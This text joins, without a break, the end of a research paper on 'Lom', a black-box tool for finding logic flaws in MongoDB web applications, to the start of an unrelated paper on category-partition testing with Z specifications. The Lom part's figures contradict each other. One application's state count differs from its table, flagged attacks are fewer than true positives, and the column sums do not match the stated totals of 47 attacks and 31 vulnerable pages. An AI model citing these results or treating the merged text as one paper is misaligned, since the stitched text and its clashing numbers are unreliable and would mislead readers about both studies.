Login Helper requires the user to provide a LoginProfile file, which specifies the input symbol that represents the login request and at least one set of legitimate user credentials, e.g., username and password, for each type of user, e.g., regular user or administrator. 6 Evaluation We choose a set of interactive MongoDB-based web applications to evaluate our prototype system Lom. We deploy all web applications on a 3.30GHz Intel Core i3-2120 Linux server with 4GB RAM. To facilitate trace collection, we build a user simulator for each application based on Selenium WebDriver. We first identify user privileges and their corresponding atomic actions by following navigation links. All of the atomic actions can be recognized as functions intended by the web application designers, since each of them follows the navigation paths implemented by the designer under normal usage; correctness is therefore guaranteed. Then the simulator automatically performs a random sequence of atomic actions with different privileges and users, and each user runs all the atomic actions under his state at least once. Our inference is performed through dynamic analysis, where the web application is executed under the constraint of navigation paths. This constraint has been applied in several existing approaches [5, 12] and shown to be effective and general enough to cover a large number of web applications. Lom first runs in Phase I and Phase II to collect traces and infer the application logic specification. The statistics of the collected traces and inferred FSMs are shown in Table 1, including the numbers of files, collected web requests, MongoDB requests, states and input symbols. Then Lom generates the testing specification and launches the testing procedure against each web application. It constructs test web requests and sends them to the application. Testing Evaluator then evaluates the test inputs based on the collected test traces. 
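The evaluation step of Section 4.5 can be sketched as a comparison between the generated test inputs and the MongoDB-side trace collected during testing (the record shapes below are hypothetical):

```python
# A test input is flagged as a potential logic flaw iff the operation it
# encodes actually shows up in the MongoDB-side trace, i.e., its output
# is not the blank symbol.
def flag_logic_flaws(test_inputs, mongodb_trace):
    triggered = {op["contour"] for op in mongodb_trace}
    return [t for t in test_inputs if t["contour"] in triggered]

# Example: the delete operation of the test input "I3 at s1" appears in
# the trace, so it is flagged; the insert test input does not appear.
trace = [{"contour": ("delete", "users", "_id")}]
tests = [
    {"name": "I3@s1", "contour": ("delete", "users", "_id")},
    {"name": "I4@s1", "contour": ("insert", "users", "name")},
]
```

This is also why EAR flaws are caught: even when the web response looks like a rejection, the triggered operation is visible in the database-side trace.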
One feature of Lom is that it also gives concrete attack vectors and evidence for further inspection. Table 2 shows the testing results, including the number of test inputs generated by each method, flagged attacks, and false positives. We also report the sum of real attacks (true positives) and the number of vulnerable web pages. Note that these two numbers can differ, because a web page may have one or more unexpected operations that can be triggered under different states. In the following, we describe the details of the logic flaws we identify in each web application. As Table 2 shows, 31 vulnerable web pages are discovered with no false positives.

6.1 Analysis of Results

Table 1 Summary of Traces and Inferred FSM <table> <thead> <tr> <th>Web Application</th> <th>File</th> <th>Web Request</th> <th>MongoDB Request</th> <th>State</th> <th>Input</th> </tr> </thead> <tbody> <tr> <td>MongoBlog</td> <td>41</td> <td>371</td> <td>1165</td> <td>2</td> <td>24</td> </tr> <tr> <td>QuickBlog</td> <td>15</td> <td>336</td> <td>346</td> <td>3</td> <td>11</td> </tr> <tr> <td>SimpleNote</td> <td>21</td> <td>437</td> <td>493</td> <td>3</td> <td>10</td> </tr> <tr> <td>ProductShow</td> <td>8</td> <td>65</td> <td>25</td> <td>2</td> <td>2</td> </tr> </tbody> </table> Table 2 Summary of Testing Results <table> <thead> <tr> <th>Web Application</th> <th>Method</th> <th>Test Inputs</th> <th>Flagged Attacks</th> <th>False Positives</th> <th>True Positives</th> <th>Vulnerable Web Pages</th> </tr> </thead> <tbody> <tr> <td>MongoBlog</td> <td>FE</td> <td>11</td> <td>10</td> <td>0</td> <td>14</td> <td>13</td> </tr> <tr> <td></td> <td>PM</td> <td>4</td> <td>4</td> <td>0</td> <td>4</td> <td>4</td> </tr> <tr> <td>QuickBlog</td> <td>FE</td> <td>21</td> <td>13</td> <td>0</td> <td>14</td> <td>10</td> </tr> <tr> <td></td> <td>PM</td> <td>1</td> <td>1</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>SimpleNote</td> <td>FE</td> <td>34</td> <td>18</td> <td>0</td> <td>18</td> <td>7</td> </tr> <tr> <td></td>
<td>PM</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>ProductShow</td> <td>FE</td> <td>1</td> <td>1</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td></td> <td>PM</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>Summary</td> <td></td> <td>72</td> <td>47</td> <td>0</td> <td>47</td> <td>31</td> </tr> </tbody> </table> True Positives: i.e., the sum of real attacks.

6.1.1 MongoBlog

There are three states in this web application: guest, regular user, and admin user. Regular users can post new articles, add comments under articles, and edit or delete the articles or comments they created themselves. Admin users can manage all articles and comments. Either a regular user or an admin user can mark his favorite articles. Several logic vulnerabilities are identified in this application. First, forceful browsing attacks can be applied to the application: guest users can publish and manage articles and comments as if they were other types of users. Second, the application can be attacked through parameter manipulation: by manipulating a parameter, a regular user can view another user's summary page, which shows that user's articles, comments, and favorite articles.

6.1.2 QuickBlog

This application also has three states: guest, regular user, and administrator. Only the administrator is allowed to modify all of the posts. A regular user can edit or delete his own posts. Logic flaws exist in the administrative and regular users' pages, which fail to check the current application state before any database operation. Thus an attacker can forcefully browse those pages and trigger sensitive operations, and a regular user can perform parameter manipulation attacks to view other regular users' pages.

6.1.3 SimpleNote

There are three states in SimpleNote: regular user, user manager, and super administrator. Each regular user can only view, edit, and delete his own notes. User managers can manage the profiles of regular users.
Super administrators have the highest privilege; they are allowed to handle all users and notes. We identify logic vulnerabilities in the user managers' and super administrators' pages, which omit checks of the current application state. These vulnerabilities allow an attacker to browse the vulnerable pages directly and manage other users' notes or profiles.

6.1.4 ProductShow

ProductShow has two states: the administrator, who can add new products to MongoDB from his own page, and the common user, who can read product information. An attacker can forcefully browse the administrative page because the application does not check the current application state.

7 Conclusions

In this paper, we present the first systematic black-box approach to identifying logic flaws in MongoDB-based web applications. A prototype system, Lom, which introduces a MongoDB operation model to support the new features of MongoDB and models the application logic as a Mealy finite state machine, is implemented and evaluated to demonstrate the practical utility of our approach. As web application technology develops, the method of this paper can be extended in several related areas, which will be the focus of our further research: 1. Logic flaws in web applications based on other NoSQL databases: The NoSQL database we concentrate on is MongoDB, which is representative of NoSQL databases. Nevertheless, there are various categories of NoSQL database, e.g., columnar storage, graph storage, key-value storage, and XML storage. Each kind of NoSQL database has its own characteristics, and these features may bring new challenges worth studying. 2. Other kinds of vulnerabilities in web applications based on NoSQL databases: The approach we present in this paper targets logic flaws in web applications based on NoSQL databases, and our work solves the challenges brought by the NoSQL database.
It is worth considering whether NoSQL databases will bring challenges to other security problems, such as input validation vulnerabilities. In summary, this paper makes progress on discovering logic flaws in MongoDB-based web applications and is of practical value. It also provides a reference for further research on web application security. **Shuo Wen** received his B.S. in Computer Science and Technology from Nankai University, China, in 2009. Currently, he is a Ph.D. student at the Institute of Machine Intelligence, College of Computer and Control Engineering, Nankai University, China. His research area includes networking and distributed systems with a focus on web applications and services and cloud computing. His research goal is to provide application and data integrity and privacy for next generation networking and distributed systems. E-mail: wenshuo@mail.nankai.edu.cn (Corresponding author) **Yuan Xue** received her B.S. in Computer Science from Harbin Institute of Technology, China, in 1998 and her M.S. and Ph.D. in Computer Science from the University of Illinois at Urbana-Champaign in 2002 and 2005. Currently, she is an assistant professor at the Department of Electrical Engineering and Computer Science of Vanderbilt University. Her research area includes networking and distributed systems with a focus on wireless and mobile systems, web applications and services, clinical information systems and cloud computing. Her research goal is to provide performance optimization, quality of service support, application and data integrity and privacy for next generation networking and distributed systems. Prof. Xue is an NSF CAREER Award winner. E-mail: yuan.xue@vanderbilt.edu **Jing Xu** has been a professor at Nankai University in the Institute of Machine Intelligence since 2006. Her research fields include software engineering, software testing and information technology security evaluation. Prof.
Xu is a member of the China Computer Federation's Software Engineering Technical Committee. E-mail: xujing@nankai.edu.cn **Li-Ying Yuan** received her B.S. in Computer Science and Technology from Nankai University, China, in 2014. Currently, she is an M.S. student at the Institute of Machine Intelligence, College of Computer and Control Engineering, Nankai University, China. Her research area includes software analysis. E-mail: yuanliying@mail.nankai.edu.cn **Wen-Li Song** received her B.S. in Computer Science and Technology from Nankai University, China, in 2013. Currently, she is an M.S. student at the Institute of Machine Intelligence, College of Computer and Control Engineering, Nankai University, China. Her research area includes software analysis. E-mail: wenli.song@foxmail.com **Hong-Ji Yang** is a Professor in the Centre for Creative Computing, Bath Spa University, Bath, England. He has taken part in many important international conferences, such as the International Conference on Software Maintenance, the 8th IEEE Workshop on Future Trends of Distributed Computing Systems, and the 26th Annual International Computer Software and Applications Conference. He is also the leader of the Software Evolution and Reengineering Group at the Software Technology Research Laboratory. Prof. Yang has been an IEEE Computer Society Golden Core Member since 2010 and a member of the EPSRC Peer Review College since 2003. E-mail: hyang@dmu.ac.uk **Guan-Nan Si** received the Ph.D. degree from Nankai University, Tianjin, China, in 2011. He is currently an assistant professor at Shandong Jiaotong University. His research interests are software engineering and software evaluation technology. E-mail: siguannan@163.com References
Using Formal Methods To Derive Test Frames In Category-Partition Testing Paul Ammann * Jeff Offutt † pammann@isse.gmu.edu ofut@isse.gmu.edu Department of Information and Software Systems Engineering George Mason University, Fairfax, VA 22030 Abstract Testing is a standard method of assuring that software performs as intended. In this paper, we extend the category-partition method, which is a specification-based testing method. An important aspect of category-partition testing is the construction of test specifications as an intermediate between functional specifications and actual tests. We define a minimal coverage criterion for category-partition test specifications, identify a mechanical process to produce a test specification that satisfies the criterion, and discuss the problem of resolving infeasible combinations of choices for categories. Our method uses formal schema-based functional specifications and is shown to be feasible with an example study of a simple file system. 1 Introduction Testing software is a standard, though imperfect, method of assuring software quality. The general aim of the research reflected in this paper is to formalize, and mechanize where possible, routine aspects of testing. Such formalization has two benefits. First, it makes it easier to analyze a given test set to ensure that it satisfies a specified coverage criterion. Second, it frees the test engineer to concentrate on less formalizable, and often more interesting tests. Specification-based testing, or black-box testing, relies on properties of the software that are captured in the functional specification, as opposed to the source code. The category-partition method [BHO89, OB88] is a specification-based test method that has received considerable attention. 
An important contribution of category-partition testing is the formalization of the notion of a test specification, which is an intermediate document designed to bridge the large gap between functional specifications and actual test cases. Some parts of a test specification can be derived mechanically from a functional specification. Other parts require the test engineer to make decisions or rely on experience. We wish to mechanize as many tasks as possible. In this paper, we address some important aspects of constructing a test specification that are left open in the category-partition method. Specifically, we:
- define a minimal coverage criterion for category-partition testing,
- supply a general procedure for enumerating tests that satisfy the criterion,
- supply a method for deriving test cases from test scripts, and
- supply a method of identifying and eliminating infeasible tests caused by conflicting choices.
A side effect of our method is that we are sometimes able to uncover anomalies in the functional specification. This allows us to, in some cases, detect unsatisfiable (as defined by Kemmerer [Kem85]) specifications. We employ formal methods, in particular Z specifications, as a tool in our investigation of test generation. There are several motivations for using formal methods. First, some of the analysis necessary to produce a test specification has already been done for a formal functional specification, and hence less effort is required to produce a test specification from a formal functional specification. Second, using formal methods makes the determination of whether part of a test specification results from a mechanical process or from the test engineer's judgement more objective. Finally, formal methods are well suited to describing artifacts of the testing process itself. Such artifacts include parts of the test specification and actual test cases.
1.1 Related Work A variety of researchers have investigated the use of formal methods in test generation. Kemmerer suggested ways to test formal specifications for such problems as being unsatisfiable [Kem85]. In the DAISTS system of Gannon, McMullin, and Hamlet [GMH81], axioms from an algebraic specification and test points specified by a test engineer are used to specify test sets for abstract data types. Hayes [Hay86] exploits the refinement of an abstract Z specification to a (more) concrete specification to specify tests at the design level. Amla and Ammann [AA92] described a technique in which category-partition tests are partially specified by extracting information captured in Z specifications of abstract data types. Laycock [Lay92] independently derived similar results. More recently, Stocks and Carrington [SC93a, SC93b] have used formal methods to describe test artifacts, specifically test frames (sets of test inputs that satisfy a common property) and test heuristics (specific methods for testing software). 1.2 Outline of paper In section 2, we review the steps in the category-partition method. The Z constructs that we need are described in section 3; further information may be found in the Z reference manual [Spi89] or one of the many Z textbooks [Dil90, PST91, Wor92]. Section 4 defines a minimal coverage criterion for category partition testing, gives a procedure for deriving specifications that satisfy the criterion, and defines a method to produce test scripts from the resulting test specifications. Section 5 presents partial Z specifications, test specifications, test frames, and test case scripts for an example system. Finally, we summarize our results and findings in Section 6. 2 Category-Partition Method The category-partition method [BHO89, OB88] is a specification-based testing strategy that uses an informal functional specification to produce formal test specifications. 
The category-partition method offers the test engineer a general procedure for creating test specifications. The test engineer's key job is to develop categories, which are defined to be the major characteristics of the input domain of the function under test, and to partition each category into equivalence classes of inputs called choices. By definition, choices in each category must be disjoint, and together the choices in each category must cover the input domain. The steps in the category-partition method that lead to a test specification are as follows.
1. Analyze the specification to identify the individual functional units that can be tested separately.
2. Identify the input domain, that is, the parameters and environment variables that affect the behavior of a functional unit.
3. Identify the categories, which are the significant characteristics of parameter and environment variables.
4. Partition each category into choices.
5. Specify combinations of choices to be tested, instantiate test cases by specifying actual data values for each choice, and determine the corresponding results and the changes to the environment.
This paper focuses on the last step above. Each specified combination of choices results in a test frame. The category-partition method relies on the test engineer to determine constraints among choices to exclude certain test frames. There are two reasons to exclude a test frame from consideration. First, the test engineer may decide that the cost of building a test script for a test frame exceeds the likely benefits of executing that test. Second, a test frame may be infeasible, in that the intersection of the specified choices is the empty set. Recently, Grochtmann and Grimm [GG93] have developed classification trees, a hierarchical arrangement of categories that avoids the introduction of infeasible combinations of choices. The developers of the category-partition method have defined a test specification language called TSL [BHO89].
A test case in TSL is an operation and values for its parameters and relevant environment variables. A test script in TSL is an operation necessary to create the environmental conditions (called the SETUP portion), the test case operation, whatever command is necessary to observe the effect of the operation (VERIFY in TSL), and any exit command (CLEANUP in TSL). Test specifications written in TSL can be used to automatically generate test scripts. The test engineer may optionally give specific representative values for any given choice to aid the test generation tool in deriving specific test cases. The category-partition method supplies little explicit guidance as to which combinations of choices are desirable; the task is left mostly to the test engineer's judgement. In this work, we follow the spirit of the category-partition method, but there are differences in our use of the technique. First, we base our derivation on formal specifications of the software, since, as has been demonstrated in a variety of papers [AA92, Lay92, SC93a, SC93b], the formality of the functional specification helps to simplify and organize the production of a test specification. Second, we do not follow the TSL syntax, but instead format examples as is convenient for our presentation. Specifically, as has been done by others [SC93a, SC93b], we employ the formal specification notation to describe aspects of the tests themselves as well as to describe functional behavior.

3 Z Specifications

Z is a model-based formal specification language based on typed set theory and logic. In this paper, we focus our attention on Z specifications for abstract data types (ADTs). An ADT is characterized by specified states and operations that observe and/or change state. In Z, both states and operations on states are described with schemas. A schema has three parts: a name, a signature to define variables, and a predicate to constrain the variables.
A schema describing an ADT state has a signature whose variables define a set-based model for the ADT and a predicate that specifies invariants on the ADT. A schema describing an ADT operation has a signature that defines the inputs, outputs, state variables from the prior state, and state variables from the resulting state. The predicate of an operation schema constrains the variables with preconditions and postconditions. By the usual convention in Z, input variables are decorated with a trailing "?", and output variables are decorated with a trailing "!". State variables decorated with a trailing "'" denote the state of the variable after an operation is applied. By way of abbreviation, one schema can be included in another by using the name of the included schema in the signature of the new schema. By convention, if the included schema name is prefixed with a Δ, then the new schema may change the state variables of the included schema. If an included schema name is prefixed with a Ξ, the operation may not change the state variables of the included schema. Instances of schemas are given in the examples of Section 5. A partial mapping of Z constructs to category-partition test specifications is given by Amla and Ammann [AA92]. We briefly recap the major points below:
1. Testable units correspond to operations on the ADT.
2. Parameters (inputs) are explicitly identified with a trailing "?". Environment variables (ADT state components) are the variables of the state schema.
3. Categories have a variety of sources. Some categories are derived from preconditions and type information about the inputs and state components. Typically, there are additional desirable categories that cannot be derived from the specification; the test engineer must derive these from knowledge and experience. Recent work [SC93a, SC93b] points to other sources of categories in formal specifications.
4.
Some categories, particularly those that are based on preconditions, partition naturally into normal cases and unusual or illegal cases. Partitions for other categories depend on the semantics of the system, and often require the test engineer's judgement.
5. To determine which combinations of choices to test, there are few general rules to be found either in the Z specifications or in the previous work on category-partition testing [BHO89, OB88]. Supplying a minimal set of rules by defining a coverage criterion is one of the contributions of the current paper.
For the verification of outputs, the state invariants and postconditions are helpful. It has also been observed that Z schemas are ideal constructs for describing test frames [SC93a, SC93b]. In this case, the signature part lists the variables that make up possible test inputs and the predicate part constrains the variables as determined by the reason for the test. For example, a test frame intended to cover a statement in a program has a predicate part that gives the path expression that causes the flow of control to reach that statement. A Z schema used to describe a test frame typically describes a set of possible inputs; a refinement process must be used to select an element from the set before the test can actually be executed. If the set of possible inputs is empty, the test frame is infeasible.

4 Derivation of Test Scripts

The previous category-partition work does not give a prescription for which combinations of choices should be specified as test frames. Selecting the combinations of choices is an important problem whose solution affects the strength and efficiency of testing. In general, there is no single solution that applies in all applications, but it is nonetheless clear that some possibilities can be rejected as inadequate. In TSL specifications [BHO89], a special syntax in the form of conditionals in the RESULTS sections is provided to specify combinations of choices.
However, the TSL syntax only supports a way to specify combinations of choices. Although the authors suggest testing certain error conditions only once, deciding which choices to specify is left to the test engineer. Using all combinations of categories is generally inefficient, and the corresponding tests are repetitious and uninteresting. If we generate all combinations, where there are \( N \) categories and the \( k \)th category has \( i_k \) choices, then the number of resulting test frames is:
\[ \prod_{k=1}^{N} i_k, \quad (1) \]
which is combinatorial in cost. For example, consider a test specification with two categories \( X \) and \( Y \), where \( X \) has three choices and \( Y \) has two:

**Categories:**

\( X \): \( P_1 \), \( P_2 \), \( P_3 \)
\( Y \): \( Q_1 \), \( Q_2 \)

Let us denote a test frame that satisfies choices \( P_i \) and \( Q_j \) by \([P_i; Q_j]\). The example specification defines six possible test frames: \([P_1; Q_1]\), \([P_1; Q_2]\), \([P_2; Q_1]\), \([P_2; Q_2]\), \([P_3; Q_1]\), and \([P_3; Q_2]\). To construct a test set, one chooses from zero to six of the possible test frames, yielding a total of \( 2^6 \) or 64 possible sets of test frames (including the empty set). Although only six decisions need to be made (whether to include each test frame), the test frames are interrelated, and so the six decisions cannot be made in isolation. Thus we are left with the question: which of these test sets should be specified? We proceed by defining a minimal metric that any reasonable selection of choice combinations should satisfy. The basic principle is that each choice should be used at least once; otherwise there is no reason to have distinguished that choice from other choices in a category.
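The exhaustive-combination count of formula (1) is easy to see concretely. The sketch below enumerates all test frames for the two-category example with Python's itertools; the dictionary layout for categories is an assumed representation, not part of the paper's notation.

```python
from itertools import product

# The paper's example: category X has choices P1..P3, Y has Q1 and Q2.
categories = {"X": ["P1", "P2", "P3"], "Y": ["Q1", "Q2"]}

# Formula (1): exhaustive combination yields prod_k i_k test frames.
frames = list(product(*categories.values()))
print(len(frames))   # 6
print(frames[0])     # ('P1', 'Q1')
```

With more categories the product grows multiplicatively, which is exactly why the paper rejects exhaustive combination as a default strategy.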
Let a set of test frames that incorporates each choice at least once be defined to satisfy the *each-choice-used* criterion. As it turns out, the each-choice-used criterion is not very useful in practice. Defining successive test frames by selecting unused choices in each category where it is possible to do so results in undesirable test sets. The reason is that a system typically has some normal mode of operation, and that normal mode corresponds to a particular choice in each category.\(^1\) Call the choice in each category that corresponds to the normal mode the *base* choice. It is useful for a tester to evaluate how a system behaves in modes of operation obtained by varying from the normal mode through the non-base choices in each category. We define the *base-choice-coverage* criterion to describe such a test set. To satisfy base-choice-coverage, for each choice in a category, we combine that choice with the base choice for all other categories. This causes each non-base choice to be used at least once, and the base choices to be used several times. The number of test frames generated to satisfy either each-choice-used or base-choice-coverage is linear in the number of choices, rather than the combinatorial number from formula 1. Thus there is no significant cost advantage of each-choice-used over base-choice-coverage, and so we adopt base-choice-coverage as our minimal coverage criterion for category partition test sets. The exact number of test frames for base-choice-coverage criterion for \( N \) categories where the category \( k \) has \( i_k \) choices is: \[ (\sum_{k=1}^{N} i_k) - N + 1. \quad (2) \] Note that satisfying base-choice-coverage does not mean that a test set is adequate for a particular application. In general, given a test set that satisfies base-choice coverage, the test engineer would want to add other useful test frames. 
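The base-choice-coverage construction just defined can be sketched directly; this is a minimal illustration with assumed function and dictionary names, varying one category at a time away from the base frame.

```python
def base_choice_frames(categories, base):
    """Build a base-choice-coverage test set: the base frame, plus one
    frame per non-base choice, holding all other categories at their
    base choice.  Yields (sum_k i_k) - N + 1 frames, as in formula (2)."""
    frames = [dict(base)]
    for cat, choices in categories.items():
        for choice in choices:
            if choice != base[cat]:
                varied = dict(base)
                varied[cat] = choice   # vary exactly one category
                frames.append(varied)
    return frames

cats = {"X": ["P1", "P2", "P3"], "Y": ["Q1", "Q2"]}
frames = base_choice_frames(cats, {"X": "P1", "Y": "Q1"})
print(len(frames))  # (3 + 2) - 2 + 1 = 4
print(frames)
```

For the running example this produces exactly the frames [P1;Q1], [P2;Q1], [P3;Q1], and [P1;Q2]; a frame such as [P2;Q2], which varies two categories at once, is not generated.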
Mechanically supplying a test set that satisfies base-choice-coverage frees the test engineer to concentrate on these additional tests. A strong argument can be made, however, that a test set that does not satisfy base-choice-coverage is inadequate. While this type of argument is not as strong as one would prefer, it is similar to the arguments supporting the use of program-based coverage criteria such as statement coverage or data-flow coverage criteria such as all-uses coverage.

\(^1\) Many systems have multiple normal modes of operation, but we consider only one normal mode for simplicity here.

### 4.1 The Derivation Procedure

The following procedure creates test scripts that are based on the category-partition method. This process gives a recipe for the last step of the method, and can be used to generate TSL's RESULTS section.
1. Create a combination matrix. A convenient way to organize the values for the inputs and environment variables in test frames is with an $N$-dimensional combination matrix, where $N$ is the number of categories and each dimension represents the choices of a category. The entries in the matrix are constraints that specify a test frame for the intersection of choices. This matrix is intended as a conceptual tool that helps describe our process, rather than something that will actually be constructed in practice. An example, explained further below, is the combination matrix for the two categories, $X$ and $Y$, where numbered cells refer to setup scripts and the blank cell marks an impossible combination:

$\begin{array}{c|cc} & Q_1 & Q_2 \\ \hline P_1 & 1 & \\ P_2 & 2 & 3 \\ P_3 & 4 & 5 \\ \end{array}$

2. Identify a base test frame. For each partitioned category and each operation, the test engineer designates one choice to be the base choice. This is typically either a default choice, or a "normal" choice as taken from an expected user profile. The base test frame is constructed by selecting the base choice from each category. In the above example, we assume that $[P_1; Q_1]$ is the base test frame.
3.
Choose other combinations as test frames. The combination matrix can be used to automatically choose the remaining test frames by varying over choices in each category. In effect, we start at the base cell in the matrix, and successively choose each cell in every linear direction from the base cell. In the above example, if $[P_1; Q_1]$ forms the base frame, then we also choose $[P_1; Q_2]$, $[P_2; Q_1]$, and $[P_3; Q_1]$. 4. Identify infeasible combinations. In the combination matrix, each cell can be annotated with a number that corresponds to a setup script, or left blank if that combination is impossible. If an impossible choice (a blank cell) is reached, we shift the test frame by varying other choices until we reach a combination of choices that is possible. Since $[P_1; Q_2]$ in the above example is blank, we shift the test frame by moving $P_1$ to $P_2$ to get test frame $[P_2; Q_2]$. Note that when we shift, we shift away from the base frame. Deciding whether a combination is infeasible is equivalent to deciding whether the constraints involved can be satisfied. Although satisfiability is a hard problem, tools exist that are capable of resolving many common cases. For example, theorem proving systems can handle propositional and predicate calculus, as well as simple arithmetic properties, and hence could be used as an intelligent assistant to the test engineer. 5. Refine test frames into test cases. Each test frame represents a combination of choices, and thus is a set of candidate test inputs for that frame. To actually execute a test, an element from the test set must be chosen. Although we do not concentrate on this aspect of test generation in this paper, we do note that it is a subject of serious inquiry. For example, DeMillo and Offutt [DO91] have developed algorithms to automatically generate test cases from constraints, and Wild et al. are developing techniques to employ accumulated knowledge to refine test frames [WZFC92]. 6. 
Write operation commands. For each cell in the combination matrix that is chosen, the corresponding operation commands, setup commands, verify commands, and cleanup commands must be written. Although we expect that the test engineer needs to specify the actual commands, not all possible scripts are needed. Thus there is no need to enumerate the entire matrix, which is why this step comes towards the end. For many systems the cleanup command(s) are constant for the entire system and only need to be specified once, and only one verify command will be needed for each operation. Much of this step can be automated, but tools to do so are project specific rather than general purpose. 7. Create test scripts. Creating the actual test scripts is a straightforward process. For each chosen cell, the corresponding setup commands are chosen, the command is appended, then the verify and cleanup commands are attached. The commands can be given to an automated tool, which can combine them to automatically generate the actual test scripts, execute them, and provide the results to the tester. The complete generation of test scripts can be done prior to the design; in fact, any time after the functional specifications are written. By reusing the procedure, it is also easy to modify the test scripts once they are created.

5 The MiStix Example

We demonstrate our procedure on an example system. MiStix is based on the Unix file system, and has been used in exercises in graduate software engineering classes at George Mason University. The MiStix specification is similar to, although simpler than, the Unix file system specification developed as a Z case study in Hayes [Hay93]. There are two types of objects in the system: files and directories. The type \texttt{Name} is used to label a simple file or directory name (for example, the MiStix file “foo”): \[ \text{[Name]} \] We denote constants of type \texttt{Name} with double quoted strings, as in the example above.
Sequences of \texttt{Name} are full file or directory names (for example, the MiStix file “/usr/bin/foo”):

\[ FullName == \text{seq}\ Name \]

The representation chosen here has the leaf elements at the tail of the sequence, and so, for example, the representation of “/usr/bin/foo” is the sequence \( \langle usr, bin, foo \rangle \). We use the sequence manipulation functions \texttt{front}, which yields the subsequence up to the last element (e.g., \( front\ \langle usr, bin, foo \rangle = \langle usr, bin \rangle \)), and \texttt{last}, which yields the element at the end of the sequence (e.g., \( last\ \langle usr, bin, foo \rangle = foo \)).

5.1 State Description

The state of \texttt{FileSystem} is represented by the directories in the system (\texttt{dirs}), the files (\texttt{files}), and a current working directory (\texttt{cwd}). The Z schema for \texttt{FileSystem} is as follows:

\[
\begin{array}{l}
FileSystem \\
\hline
files : \mathbb{P}\, FullName \\
dirs : \mathbb{P}\, FullName \\
cwd : FullName \\
\hline
\forall f : files \cup dirs \bullet f \neq \langle\rangle \Rightarrow front\ f \in dirs \\
cwd \in dirs \\
\end{array}
\]

\texttt{FileSystem} has three components in its signature, \texttt{files}, \texttt{dirs}, and \texttt{cwd}, and two invariants in the predicate. The first component, \texttt{files}, is the set of files that currently exist in the system. (The \( \mathbb{P} \) in \( \mathbb{P}\, FullName \) is the powerset constructor and is read \textit{“set of”}.) The second component, \texttt{dirs}, is the set of directories that currently exist in the system. The last component, \texttt{cwd}, does not record any permanent feature of the file system, but is instead used to mark a user’s current working directory. The first invariant states that, with the exception of the root directory \( \langle\rangle \), for a file or directory to exist, it must be in a valid directory.
(As a note on Z notation, the \( \bullet \) in the first invariant may be read, “it is the case that”.) The second invariant states that \texttt{cwd} must be an existing directory. Note that there is no constraint that prohibits files and directories from sharing the same name, although such a constraint might be desirable and could easily be added by including a third predicate \( files \cap dirs = \emptyset \).

5.2 Example MiStix Operation

By way of example, we give the specifications for one representative operation, \texttt{CreateDir}. The English specification for the operation \texttt{CreateDir} \( n? \) is as follows: if the name \( n? \) is not already in the current directory, create a new directory called \( n? \) as a subdirectory of the current directory, else print an appropriate error message. The Z formal specification for \texttt{CreateDir} is as follows (the specification for the error message has been omitted here):

\[
\begin{array}{l}
CreateDir \\
\hline
\Delta FileSystem \\
n? : Name \\
\hline
cwd \frown \langle n? \rangle \notin dirs \\
dirs' = dirs \cup \{ cwd \frown \langle n? \rangle \} \\
\end{array}
\]

CreateDir modifies the state of the file system (hence the \( \Delta FileSystem \)), and takes the new directory name, \( n? \), as an input. The first predicate, the precondition for the operation, is that the directory to be created, the concatenation of the current working directory with the new name (\( cwd \frown \langle n? \rangle \)), does not already exist. The second predicate, the postcondition, adds the new directory to the set \( dirs' \). Remember that \( dirs' \) denotes the value of the \( dirs \) environment variable after execution of the operation. Note that we do not need to specify that \( cwd \) is valid, since the \( FileSystem \) predicates ensure that.

5.3 Tests For CreateDir

In this section we apply the method of Amla and Ammann [AA92] to part of MiStix. The remainder of the test specification for MiStix is similar, although lengthy, and can be found in the technical report [AO83].
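As an executable gloss on the Z schemas above (our own sketch, not part of the paper), the \texttt{FileSystem} state and the \texttt{CreateDir} operation can be modelled directly in Python, with full names represented as tuples of name components and the root directory as the empty tuple:

```python
def invariant(files, dirs, cwd):
    """FileSystem invariants: every non-root object lives in an
    existing directory (front f in dirs), and cwd is an existing directory."""
    return all(f == () or f[:-1] in dirs for f in files | dirs) and cwd in dirs

def create_dir(files, dirs, cwd, n):
    """CreateDir: precondition cwd ^ <n> not in dirs;
    postcondition dirs' = dirs union {cwd ^ <n>}."""
    new = cwd + (n,)
    if new in dirs:
        raise ValueError("directory already exists")
    return files, dirs | {new}, cwd

# The root directory is the empty sequence ().
files, dirs, cwd = set(), {()}, ()
assert invariant(files, dirs, cwd)
files, dirs, cwd = create_dir(files, dirs, cwd, "usr")
assert ("usr",) in dirs and invariant(files, dirs, cwd)
```

The `front` function of the Z specification corresponds to `f[:-1]`, and sequence concatenation to tuple addition; as in the schema, the postcondition leaves `files` and `cwd` unchanged.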
The first step in category-partition testing (as given in section 2) is to identify the testable units, which in this case include CreateDir. The second step is identification of the inputs and environment (state) variables for CreateDir. From the syntax of the operation, it is clear that \( n? \) of type \( Name \) is the explicit input and that \( dirs \) and \( cwd \) are the state variables of interest. Formally, we can describe the input domain for CreateDir with the schema:

\[
\begin{array}{l}
CreateDir\ Input\ Domain \\
\hline
\Delta FileSystem \\
n? : Name \\
\end{array}
\]

Note that the schema \( FileSystem \) includes both the declarations for \( dirs \) and \( cwd \) and also constraints on the values \( dirs \) and \( cwd \) can take.\(^2\) The third step is the identification of the categories, or important characteristics of the inputs. One source of categories is preconditions on operations. Preconditions are good sources for categories because they are precisely the predicates on the domain of a testable unit that distinguish normal operation from undefined or erroneous operation. For CreateDir, the precondition is that the directory to be created does not already exist. Two choices for a category based on the precondition are that the directory to be created does not yet exist and that it already exists. Another source of categories is revealed by examining other parts of the MiStix specification and noting that variables of type \( Name \) can assume two special values. One special value, which we denote \( PARENT \), is the value of \( n? \) used when referring to the parent directory. The special value \( PARENT \) corresponds to the “..” in Unix filename specifications. The behavior of CreateDir with respect to a request to create a file named \( PARENT \) is technically allowed by the formal specification, but clearly represents a case that should be disallowed.
